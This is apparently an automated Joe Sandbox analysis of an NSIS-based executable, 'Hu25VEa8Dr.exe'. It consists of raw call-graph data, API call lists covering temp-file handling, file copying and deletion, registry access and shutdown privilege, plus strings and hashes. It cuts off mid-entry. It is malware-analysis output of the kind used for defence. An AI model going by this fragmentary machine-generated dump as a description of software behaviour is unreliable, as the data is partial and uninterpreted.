402360 lstrlenA 3681->3684 3683 40238e RegSetValueExA 3682->3683 3686 402e5b 33 API calls 3682->3686 3687 4023a4 RegCloseKey 3683->3687 3684->3680 3685->3682 3686->3683 3687->3678 3689 402803 3690 4029d9 18 API calls 3689->3690 3691 402809 3690->3691 3692 40283a 3691->3692 3693 40265c 3691->3693 3695 402817 3691->3695 3692->3693 3694 405a2e 18 API calls 3692->3694 3694->3693 3695->3693 3697 40596a wsprintfA 3695->3697 3697->3693 2808 401b06 2809 401b57 2808->2809 2812 401b13 2808->2812 2810 401b80 GlobalAlloc 2809->2810 2813 401b5b 2809->2813 2815 405a2e 18 API calls 2810->2815 2811 4021fb 2816 405a2e 18 API calls 2811->2816 2812->2811 2817 401b2a 2812->2817 2814 401b9b 2813->2814 2829 405a0c lstrcpynA 2813->2829 2815->2814 2819 402208 2816->2819 2827 405a0c lstrcpynA 2817->2827 2822 4052cd MessageBoxIndirectA 2819->2822 2821 401b6d GlobalFree 2821->2814 2822->2814 2823 401b39 2828 405a0c lstrcpynA 2823->2828 2825 401b48 2830 405a0c lstrcpynA 2825->2830 2827->2823 2828->2825 2829->2821 2830->2814 3698 403f06 3699 403f1c 3698->3699 3702 404029 3698->3702 3703 403dbe 19 API calls 3699->3703 3700 404098 3701 40416c 3700->3701 3704 4040a2 GetDlgItem 3700->3704 3709 403e25 8 API calls 3701->3709 3702->3700 3702->3701 3708 40406d GetDlgItem SendMessageA 3702->3708 3705 403f72 3703->3705 3706 4040b8 3704->3706 3707 40412a 3704->3707 3710 403dbe 19 API calls 3705->3710 3706->3707 3711 4040de 6 API calls 3706->3711 3707->3701 3712 40413c 3707->3712 3729 403de0 EnableWindow 3708->3729 3714 404167 3709->3714 3715 403f7f CheckDlgButton 3710->3715 3711->3707 3716 404142 SendMessageA 3712->3716 3717 404153 3712->3717 3727 403de0 EnableWindow 3715->3727 3716->3717 3717->3714 3720 404159 SendMessageA 3717->3720 3718 404093 3721 404191 SendMessageA 3718->3721 3720->3714 3721->3700 3722 403f9d GetDlgItem 3728 403df3 SendMessageA 3722->3728 3724 403fb3 SendMessageA 3725 403fd1 GetSysColor 3724->3725 3726 403fda SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3724->3726 3725->3726 3726->3714 3727->3722 3728->3724 3729->3718 3730 402506 3731 4029d9 18 API calls 3730->3731 3734 402510 3731->3734 3732 402586 3733 402544 ReadFile 3733->3732 3733->3734 3734->3732 3734->3733 3735 402588 3734->3735 3737 402598 3734->3737 3739 40596a wsprintfA 3735->3739 3737->3732 3738 4025ae SetFilePointer 3737->3738 3738->3732 3739->3732 2831 401389 2833 401390 2831->2833 2832 4013fe 2833->2832 2834 4013cb MulDiv SendMessageA 2833->2834 2834->2833 3740 401c8a 3741 4029d9 18 API calls 3740->3741 3742 401c91 3741->3742 3743 4029d9 18 API calls 3742->3743 3744 401c99 GetDlgItem 3743->3744 3745 4024b8 3744->3745 3746 403513 3747 40351e 3746->3747 3748 403522 3747->3748 3749 403525 GlobalAlloc 3747->3749 3749->3748 2804 401595 2805 4029f6 18 API calls 2804->2805 2806 40159c SetFileAttributesA 2805->2806 2807 4015ae 2806->2807 3750 402615 3751 402618 3750->3751 3755 402630 3750->3755 3752 402625 FindNextFileA 3751->3752 3753 40266f 3752->3753 3752->3755 3756 405a0c lstrcpynA 3753->3756 3756->3755 3757 401d95 3758 4029d9 18 API calls 3757->3758 3759 401d9b 3758->3759 3760 4029d9 18 API calls 3759->3760 3761 401da4 3760->3761 3762 401db6 EnableWindow 3761->3762 3763 401dab ShowWindow 3761->3763 3764 40288b 3762->3764 3763->3764 3765 401e95 3766 4029f6 18 API calls 3765->3766 3767 401e9c 3766->3767 3768 405d07 2 API calls 3767->3768 3769 401ea2 3768->3769 3771 401eb4 3769->3771 3772 40596a wsprintfA 3769->3772 3772->3771 3773 401696 3774 4029f6 18 API calls 3773->3774 3775 40169c GetFullPathNameA 3774->3775 3778 4016b3 3775->3778 3782 4016d4 3775->3782 3776 4016e8 GetShortPathNameA 3777 40288b 3776->3777 3779 405d07 2 API calls 3778->3779 3778->3782 3780 4016c4 3779->3780 3780->3782 3783 405a0c lstrcpynA 3780->3783 3782->3776 3782->3777 3783->3782 3784 401d1b GetDC GetDeviceCaps 3785 4029d9 18 API calls 3784->3785 3786 401d37 MulDiv 3785->3786 3787 4029d9 18 API calls 3786->3787 3788 401d4c 3787->3788 3789 405a2e 18 API calls 3788->3789 3790 401d85 CreateFontIndirectA 3789->3790 3791 4024b8 3790->3791 3792 401e1b 3793 4029f6 18 API calls 3792->3793 3794 401e21 3793->3794 3795 404daa 25 API calls 3794->3795 3796 401e2b 3795->3796 3797 40526c 2 API calls 3796->3797 3798 401e31 3797->3798 3799 40265c 3798->3799 3800 401e87 CloseHandle 3798->3800 3801 401e50 WaitForSingleObject 3798->3801 3803 405d67 2 API calls 3798->3803 3800->3799 3801->3798 3802 401e5e GetExitCodeProcess 3801->3802 3804 401e70 3802->3804 3805 401e79 3802->3805 3803->3801 3807 40596a wsprintfA 3804->3807 3805->3800 3807->3805 3808 40249c 3809 4029f6 18 API calls 3808->3809 3810 4024a3 3809->3810 3813 4056e3 GetFileAttributesA CreateFileA 3810->3813 3812 4024af 3813->3812 3814 402020 3815 4029f6 18 API calls 3814->3815 3816 402027 3815->3816 3817 4029f6 18 API calls 3816->3817 3818 402031 3817->3818 3819 4029f6 18 API calls 3818->3819 3820 40203a 3819->3820 3821 4029f6 18 API calls 3820->3821 3822 402044 3821->3822 3823 4029f6 18 API calls 3822->3823 3825 40204e 3823->3825 3824 402062 CoCreateInstance 3829 402081 3824->3829 3830 402137 3824->3830 3825->3824 3826 4029f6 18 API calls 3825->3826 3826->3824 3827 401423 25 API calls 3828 402169 3827->3828 3829->3830 3831 402116 MultiByteToWideChar 3829->3831 3830->3827 3830->3828 3831->3830 2690 401721 2691 4029f6 18 API calls 2690->2691 2692 401728 2691->2692 2696 405712 2692->2696 2694 40172f 2695 405712 2 API calls 2694->2695 2695->2694 2697 40571d GetTickCount GetTempFileNameA 2696->2697 2698 405749 2697->2698 2699 40574d 2697->2699 2698->2697 2698->2699 2699->2694 3832 401922 3833 4029f6 18 API calls 3832->3833 3834 401929 lstrlenA 3833->3834 3835 4024b8 3834->3835 3836 402223 3837 40222b 3836->3837 3840 402231 3836->3840 3838 4029f6 18 API calls 3837->3838 3838->3840 3839 402241 3842 40224f 3839->3842 3843 4029f6 18 API calls 3839->3843 3840->3839 3841 4029f6 18 API calls 3840->3841 3841->3839 3844 4029f6 18 API calls 3842->3844 3843->3842 3845 402258 WritePrivateProfileStringA 3844->3845 3846 401ca5 3847 4029d9 18 API calls 3846->3847 3848 401cb5 SetWindowLongA 3847->3848 3849 40288b 3848->3849 3850 401a26 3851 4029d9 18 API calls 3850->3851 3852 401a2c 3851->3852 3853 4029d9 18 API calls 3852->3853 3854 4019d6 3853->3854 3855 402427 3856 402b00 19 API calls 3855->3856 3857 402431 3856->3857 3858 4029d9 18 API calls 3857->3858 3859 40243a 3858->3859 3860 402451 RegEnumKeyA 3859->3860 3861 40245d RegEnumValueA 3859->3861 3863 40265c 3859->3863 3862 402476 RegCloseKey 3860->3862 3861->3862 3861->3863 3862->3863 3865 4022a7 3866 4022d7 3865->3866 3867 4022ac 3865->3867 3869 4029f6 18 API calls 3866->3869 3868 402b00 19 API calls 3867->3868 3870 4022b3 3868->3870 3872 4022de 3869->3872 3871 4029f6 18 API calls 3870->3871 3875 4022f4 3870->3875 3873 4022c4 RegDeleteValueA RegCloseKey 3871->3873 3876 402a36 RegOpenKeyExA 3872->3876 3873->3875 3879 402a61 3876->3879 3885 402aad 3876->3885 3877 402a87 RegEnumKeyA 3878 402a99 RegCloseKey 3877->3878 3877->3879 3881 405d2e 3 API calls 3878->3881 3879->3877 3879->3878 3880 402abe RegCloseKey 3879->3880 3882 402a36 3 API calls 3879->3882 3880->3885 3883 402aa9 3881->3883 3882->3879 3884 402ad9 RegDeleteKeyA 3883->3884 3883->3885 3884->3885 3885->3875 3886 401bad 3887 4029d9 18 API calls 3886->3887 3888 401bb4 3887->3888 3889 4029d9 18 API calls 3888->3889 3890 401bbe 3889->3890 3891 4029f6 18 API calls 3890->3891 3892 401bce 3890->3892 3891->3892 3893 4029f6 18 API calls 3892->3893 3897 401bde 3892->3897 3893->3897 3894 401be9 3898 4029d9 18 API calls 3894->3898 3895 401c2d 3896 4029f6 18 API calls 3895->3896 3900 401c32 3896->3900 3897->3894 3897->3895 3899 401bee 3898->3899 3901 4029d9 18 API calls 3899->3901 3902 4029f6 18 API calls 3900->3902 3903 401bf7 3901->3903 3904 401c3b FindWindowExA 3902->3904 3905 401c1d SendMessageA 3903->3905 3906 401bff SendMessageTimeoutA 3903->3906 3907 401c59 3904->3907 3905->3907 3906->3907 3171 4023af 3182 402b00 3171->3182 3173 4023b9 3174 4029f6 18 API calls 3173->3174 3175 4023c2 3174->3175 3176 4023cc RegQueryValueExA 3175->3176 3178 40265c 3175->3178 3177 4023ec 3176->3177 3181 4023f2 RegCloseKey 3176->3181 3177->3181 3186 40596a wsprintfA 3177->3186 3181->3178 3183 4029f6 18 API calls 3182->3183 3184 402b19 3183->3184 3185 402b27 RegOpenKeyExA 3184->3185 3185->3173 3186->3181 3908 404531 3909 404541 3908->3909 3910 40455d 3908->3910 3919 4052b1 GetDlgItemTextA 3909->3919 3912 404590 3910->3912 3913 404563 SHGetPathFromIDListA 3910->3913 3915 40457a SendMessageA 3913->3915 3916 404573 3913->3916 3914 40454e SendMessageA 3914->3910 3915->3912 3918 40140b 2 API calls 3916->3918 3918->3915 3919->3914 2700 4015b3 2701 4029f6 18 API calls 2700->2701 2702 4015ba 2701->2702 2718 405593 CharNextA CharNextA 2702->2718 2704 40160a 2706 40162d 2704->2706 2707 40160f 2704->2707 2705 40552a CharNextA 2708 4015d0 CreateDirectoryA 2705->2708 2712 401423 25 API calls 2706->2712 2709 401423 25 API calls 2707->2709 2710 4015e5 GetLastError 2708->2710 2714 4015c2 2708->2714 2711 401616 2709->2711 2713 4015f2 GetFileAttributesA 2710->2713 2710->2714 2724 405a0c lstrcpynA 2711->2724 2716 402169 2712->2716 2713->2714 2714->2704 2714->2705 2717 401621 SetCurrentDirectoryA 2717->2716 2719 4055ad 2718->2719 2723 4055b9 2718->2723 2720 4055b4 CharNextA 2719->2720 2719->2723 2721 4055d6 2720->2721 2721->2714 2722 40552a CharNextA 2722->2723 2723->2721 2723->2722 2724->2717 2725 401734 2726 4029f6 18 API calls 2725->2726 2727 40173b 2726->2727 2728 401761 2727->2728 2729 401759 2727->2729 2787 405a0c lstrcpynA 2728->2787 2786 405a0c lstrcpynA 2729->2786 2732 40175f 2736 405c6e 5 API calls 2732->2736 2733 40176c 2788 4054ff lstrlenA CharPrevA 2733->2788 2743 40177e 2736->2743 2738 4017bf 2794 4056c4 GetFileAttributesA 2738->2794 2741 401795 CompareFileTime 2741->2743 2742 401859 2744 404daa 25 API calls 2742->2744 2743->2738 2743->2741 2743->2742 2746 405a0c lstrcpynA 2743->2746 2752 405a2e 18 API calls 2743->2752 2763 401830 2743->2763 2764 4056e3 GetFileAttributesA CreateFileA 2743->2764 2791 405d07 FindFirstFileA 2743->2791 2797 4052cd 2743->2797 2747 401863 2744->2747 2745 404daa 25 API calls 2751 401845 2745->2751 2746->2743 2765 402e5b 2747->2765 2750 40188a SetFileTime 2753 40189c CloseHandle 2750->2753 2752->2743 2753->2751 2754 4018ad 2753->2754 2755 4018b2 2754->2755 2756 4018c5 2754->2756 2758 405a2e 18 API calls 2755->2758 2757 405a2e 18 API calls 2756->2757 2759 4018cd 2757->2759 2761 4018ba lstrcatA 2758->2761 2762 4052cd MessageBoxIndirectA 2759->2762 2761->2759 2762->2751 2763->2745 2763->2751 2764->2743 2766 402e71 2765->2766 2767 402e9f 2766->2767 2803 4030af SetFilePointer 2766->2803 2801 40307d ReadFile 2767->2801 2771 403011 2773 403015 2771->2773 2774 40302d 2771->2774 2772 402ebc GetTickCount 2777 401876 2772->2777 2785 402f0b 2772->2785 2775 40307d ReadFile 2773->2775 2774->2777 2778 40307d ReadFile 2774->2778 2779 403048 WriteFile 2774->2779 2775->2777 2776 40307d ReadFile 2776->2785 2777->2750 2777->2753 2778->2774 2779->2777 2780 40305d 2779->2780 2780->2774 2780->2777 2781 402f61 GetTickCount 2781->2785 2782 402f86 MulDiv wsprintfA 2783 404daa 25 API calls 2782->2783 2783->2785 2784 402fc4 WriteFile 2784->2777 2784->2785 2785->2776 2785->2777 2785->2781 2785->2782 2785->2784 2786->2732 2787->2733 2789 401772 lstrcatA 2788->2789 2790 405519 lstrcatA 2788->2790 2789->2732 2790->2789 2792 405d28 2791->2792 2793 405d1d FindClose 2791->2793 2792->2743 2793->2792 2795 4056e0 2794->2795 2796 4056d3 SetFileAttributesA 2794->2796 2795->2743 2796->2795 2798 4052e2 2797->2798 2799 4052f6 MessageBoxIndirectA 2798->2799 2800 40532e 2798->2800 2799->2800 2800->2743 2802 402eaa 2801->2802 2802->2771 2802->2772 2802->2777 2803->2767 3920 401634 3921 4029f6 18 API calls 3920->3921 3922 40163a 3921->3922 3923 405d07 2 API calls 3922->3923 3924 401640 3923->3924 3925 401934 3926 4029d9 18 API calls 3925->3926 3927 40193b 3926->3927 3928 4029d9 18 API calls 3927->3928 3929 401945 3928->3929 3930 4029f6 18 API calls 3929->3930 3931 40194e 3930->3931 3932 401961 lstrlenA 3931->3932 3933 40199c 3931->3933 3934 40196b 3932->3934 3934->3933 3938 405a0c lstrcpynA 3934->3938 3936 401985 3936->3933 3937 401992 lstrlenA 3936->3937 3937->3933 3938->3936 3939 4041b5 3940 4041c5 3939->3940 3941 4041eb 3939->3941 3942 403dbe 19 API calls 3940->3942 3943 403e25 8 API calls 3941->3943 3944 4041d2 SetDlgItemTextA 3942->3944 3945 4041f7 3943->3945 3944->3941 3946 4019b5 3947 4029f6 18 API calls 3946->3947 3948 4019bc 3947->3948 3949 4029f6 18 API calls 3948->3949 3950 4019c5 3949->3950 3951 4019cc lstrcmpiA 3950->3951 3952 4019de lstrcmpA 3950->3952 3953 4019d2 3951->3953 3952->3953 3954 4014b7 3955 4014bd 3954->3955 3956 401389 2 API calls 3955->3956 3957 4014c5 3956->3957 3958 402b3b 3959 402b63 3958->3959 3960 402b4a SetTimer 3958->3960 3961 402bb8 3959->3961 3962 402b7d MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 3959->3962 3960->3959 3962->3961 3963 40263e 3964 4029f6 18 API calls 3963->3964 3965 402645 FindFirstFileA 3964->3965 3966 402668 3965->3966 3969 402658 3965->3969 3967 40266f 3966->3967 3971 40596a wsprintfA 3966->3971 3972 405a0c lstrcpynA 3967->3972 3971->3967 3972->3969 3973 4024be 3974 4024c3 3973->3974 3975 4024d4 3973->3975 3976 4029d9 18 API calls 3974->3976 3977 4029f6 18 API calls 3975->3977 3979 4024ca 3976->3979 3978 4024db lstrlenA 3977->3978 3978->3979 3980 4024fa WriteFile 3979->3980 3981 40265c 3979->3981 3980->3981

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 0 4030fa-40318f #17 SetErrorMode OleInitialize call 405d2e SHGetFileInfoA call 405a0c GetCommandLineA call 405a0c GetModuleHandleA 7 403191-403196 0->7 8 40319b-4031b0 call 40552a CharNextA 0->8 7->8 11 403215-403219 8->11 12 4031b2-4031b5 11->12 13 40321b 11->13 15 4031b7-4031bb 12->15 16 4031bd-4031c5 12->16 14 40322e-403246 GetTempPathA call 4030c6 13->14 25 403268-403274 DeleteFileA call 402c22 14->25 26 403248-403266 GetWindowsDirectoryA lstrcatA call 4030c6 14->26 15->15 15->16 17 4031c7-4031c8 16->17 18 4031cd-4031d0 16->18 17->18 20 4031d2-4031d6 18->20 21 403205-403212 call 40552a 18->21 23 4031e6-4031ec 20->23 24 4031d8-4031e1 20->24 21->11 38 403214 21->38 30 4031fc-403203 23->30 31 4031ee-4031f7 23->31 24->23 28 4031e3 24->28 37 403279-40327f 25->37 26->25 40 4032e6-4032f5 ExitProcess OleUninitialize 26->40 28->23 30->21 36 40321d-403229 call 405a0c 30->36 31->30 35 4031f9 31->35 35->30 36->14 37->40 41 403281-403287 37->41 38->11 44 4033e0-4033e6 40->44 45 4032fb-40330b call 4052cd ExitProcess 40->45 42 4032d6-4032e2 call 403555 41->42 43 403289-403292 call 40552a 41->43 42->40 58 40329d-40329f 43->58 47 403463-40346b 44->47 48 4033e8-403405 call 405d2e * 3 44->48 54 403471-403475 ExitProcess 47->54 55 40346d 47->55 73 403407-403409 48->73 74 40344f-40345a ExitWindowsEx 48->74 55->54 59 4032a1-4032ab 58->59 60 403294-40329a 58->60 63 403311-40332b lstrcatA lstrcmpiA 59->63 64 4032ad-4032ba call 4055e0 59->64 60->59 62 40329c 60->62 62->58 63->40 66 40332d-403342 CreateDirectoryA SetCurrentDirectoryA 63->66 64->40 76 4032bc-4032d2 call 405a0c * 2 64->76 70 403344-40334a call 405a0c 66->70 71 40334f-403369 call 405a0c 66->71 70->71 84 40336e-40338a call 405a2e DeleteFileA 71->84 73->74 78 40340b-40340d 73->78 74->47 81 40345c-40345e call 40140b 74->81 76->42 78->74 82 40340f-403421 GetCurrentProcess 78->82 81->47 82->74 91 403423-403445 82->91 92 4033cb-4033d2 84->92 93 40338c-40339c CopyFileA 84->93 91->74 92->84 94 4033d4-4033db call 40575a 92->94 93->92 95 40339e-4033be call 40575a call 405a2e call 40526c 93->95 94->40 95->92 105 4033c0-4033c7 CloseHandle 95->105 105->92
            APIs
            • #17.COMCTL32 ref: 00403119
            • SetErrorMode.KERNELBASE(00008001), ref: 00403124
            • OleInitialize.OLE32(00000000), ref: 0040312B
              • Part of subcall function 00405D2E: GetModuleHandleA.KERNEL32(?,?,00000000,0040313D,00000008), ref: 00405D40
              • Part of subcall function 00405D2E: LoadLibraryA.KERNEL32(?), ref: 00405D4B
              • Part of subcall function 00405D2E: GetProcAddress.KERNEL32(00000000,?,?,00000000,0040313D,00000008), ref: 00405D5C
            • SHGetFileInfoA.SHELL32(00428F98,00000000,?,00000160,00000000,00000008), ref: 00403153
              • Part of subcall function 00405A0C: lstrcpynA.KERNEL32(?,?,00000400,00403168,0042E360,NSIS Error), ref: 00405A19
            • GetCommandLineA.KERNEL32(0042E360,NSIS Error), ref: 00403168
            • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Hu25VEa8Dr.exe",00000000), ref: 0040317B
            • CharNextA.USER32(00000000), ref: 004031A6
            • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403239
            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040324E
            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040325A
            • DeleteFileA.KERNELBASE(1033), ref: 0040326D
            • ExitProcess.KERNELBASE(00000000), ref: 004032E6
            • OleUninitialize.OLE32 ref: 004032EB
            • ExitProcess.KERNEL32 ref: 0040330B
            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Hu25VEa8Dr.exe",00000000,00000000), ref: 00403317
            • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Hu25VEa8Dr.exe",00000000,00000000), ref: 00403323
            • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040332F
            • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403336
            • DeleteFileA.KERNEL32(00428B98,00428B98,?,0042F000,?), ref: 00403380
            • CopyFileA.KERNEL32 ref: 00403394
            • CloseHandle.KERNEL32(00000000), ref: 004033C1
            • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403416
            • ExitWindowsEx.USER32(00000002,00000000), ref: 00403452
            • ExitProcess.KERNEL32 ref: 00403475
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: ExitFileProcess$DirectoryHandle$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
            • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\Hu25VEa8Dr.exe"$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Hu25VEa8Dr.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
            • API String ID: 553446912-711809269
            • Opcode ID: b54f9db6f0d8b9b5cada0f3be399c619291e87e839e1cbb66da7d28003e7be7a
            • Instruction ID: 1e9e478c3a9e7f3573a82b9cae4fcf3dc9ecc54075f91e84b1854e8c20532e3f
            • Opcode Fuzzy Hash: b54f9db6f0d8b9b5cada0f3be399c619291e87e839e1cbb66da7d28003e7be7a
            • Instruction Fuzzy Hash: 4191D130A08344AFE7216F61AD4AB6B7E9CEB0530AF04057FF541B61D2C77C99058B6E
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 173 405331-40534c call 4055e0 176 405365-40536f 173->176 177 40534e-405360 DeleteFileA 173->177 179 405371-405373 176->179 180 405383-405391 call 405a0c 176->180 178 4054f9-4054fc 177->178 181 4054a4-4054aa 179->181 182 405379-40537d 179->182 188 4053a0-4053a1 call 405546 180->188 189 405393-40539e lstrcatA 180->189 181->178 184 4054ac-4054af 181->184 182->180 182->181 186 4054b1-4054b7 184->186 187 4054b9-4054c1 call 405d07 184->187 186->178 187->178 197 4054c3-4054d8 call 4054ff call 4056c4 RemoveDirectoryA 187->197 191 4053a6-4053a9 188->191 189->191 193 4053b4-4053ba lstrcatA 191->193 194 4053ab-4053b2 191->194 196 4053bf-4053dd lstrlenA FindFirstFileA 193->196 194->193 194->196 198 4053e3-4053fa call 40552a 196->198 199 40549a-40549e 196->199 212 4054f1-4054f4 call 404daa 197->212 213 4054da-4054de 197->213 206 405405-405408 198->206 207 4053fc-405400 198->207 199->181 201 4054a0 199->201 201->181 210 40540a-40540f 206->210 211 40541b-405429 call 405a0c 206->211 207->206 209 405402 207->209 209->206 215 405411-405413 210->215 216 405479-40548b FindNextFileA 210->216 224 405440-40544f call 4056c4 DeleteFileA 211->224 225 40542b-405433 211->225 212->178 213->186 218 4054e0-4054ef call 404daa call 40575a 213->218 215->211 221 405415-405419 215->221 216->198 219 405491-405494 FindClose 216->219 218->178 219->199 221->211 221->216 233 405471-405474 call 404daa 224->233 234 405451-405455 224->234 225->216 226 405435-40543e call 405331 225->226 226->216 233->216 235 405457-405467 call 404daa call 40575a 234->235 236 405469-40546f 234->236 235->216 236->216
            APIs
            • DeleteFileA.KERNEL32(?,?,"C:\Users\user\Desktop\Hu25VEa8Dr.exe",00000000), ref: 0040534F
            • lstrcatA.KERNEL32(0042AFE8,\*.*,0042AFE8,?,00000000,?,"C:\Users\user\Desktop\Hu25VEa8Dr.exe",00000000), ref: 00405399
            • lstrcatA.KERNEL32(?,00409010,?,0042AFE8,?,00000000,?,"C:\Users\user\Desktop\Hu25VEa8Dr.exe",00000000), ref: 004053BA
            • lstrlenA.KERNEL32(?,?,00409010,?,0042AFE8,?,00000000,?,"C:\Users\user\Desktop\Hu25VEa8Dr.exe",00000000), ref: 004053C0
            • FindFirstFileA.KERNELBASE(0042AFE8,?,?,?,00409010,?,0042AFE8,?,00000000,?,"C:\Users\user\Desktop\Hu25VEa8Dr.exe",00000000), ref: 004053D1
            • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 00405483
            • FindClose.KERNEL32(?), ref: 00405494
            Strings
            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405331
            • "C:\Users\user\Desktop\Hu25VEa8Dr.exe", xrefs: 0040533B
            • \*.*, xrefs: 00405393
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
            • String ID: "C:\Users\user\Desktop\Hu25VEa8Dr.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
            • API String ID: 2035342205-2724472312
            • Opcode ID: eeee1fe6d78b479acfa35fd6cd9b42f31f1d942e4a3e46f321804d068e117fb2
            • Instruction ID: 46a167c19d0f92bb62e791f7a1b0a3e0954e7dde2177130d433e16ae92940f3d
            • Opcode Fuzzy Hash: eeee1fe6d78b479acfa35fd6cd9b42f31f1d942e4a3e46f321804d068e117fb2
            • Instruction Fuzzy Hash: 84510130904A5476DB21AB218C85BFF3A68DF4231AF14813BF941752D2C77C49C2DE5E
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 412 405d2e-405d48 GetModuleHandleA 413 405d55-405d5c GetProcAddress 412->413 414 405d4a-405d53 LoadLibraryA 412->414 415 405d62-405d64 413->415 414->413 414->415
            APIs
            • GetModuleHandleA.KERNEL32(?,?,00000000,0040313D,00000008), ref: 00405D40
            • LoadLibraryA.KERNEL32(?), ref: 00405D4B
            • GetProcAddress.KERNEL32(00000000,?,?,00000000,0040313D,00000008), ref: 00405D5C
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: AddressHandleLibraryLoadModuleProc
            • String ID:
            • API String ID: 310444273-0
            • Opcode ID: 7acfb344228b968400b962badda7c36266698eee5c55508006b44164a923ef80
            • Instruction ID: 58781945b1ebe0d6425232f008294b0fb1b641fb0524d4e5e5734917004db801
            • Opcode Fuzzy Hash: 7acfb344228b968400b962badda7c36266698eee5c55508006b44164a923ef80
            • Instruction Fuzzy Hash: 8CE08C36A04510BBD3215B30AE08A6B73ACEEC9B41304897EF615F6251D734AC11DBBA
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 469 405d07-405d1b FindFirstFileA 470 405d28 469->470 471 405d1d-405d26 FindClose 469->471 472 405d2a-405d2b 470->472 471->472
            APIs
            • FindFirstFileA.KERNELBASE(?,0042C030,0042B3E8,00405623,0042B3E8,0042B3E8,00000000,0042B3E8,0042B3E8,?,?,00000000,00405345,?,"C:\Users\user\Desktop\Hu25VEa8Dr.exe",00000000), ref: 00405D12
            • FindClose.KERNEL32(00000000), ref: 00405D1E
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
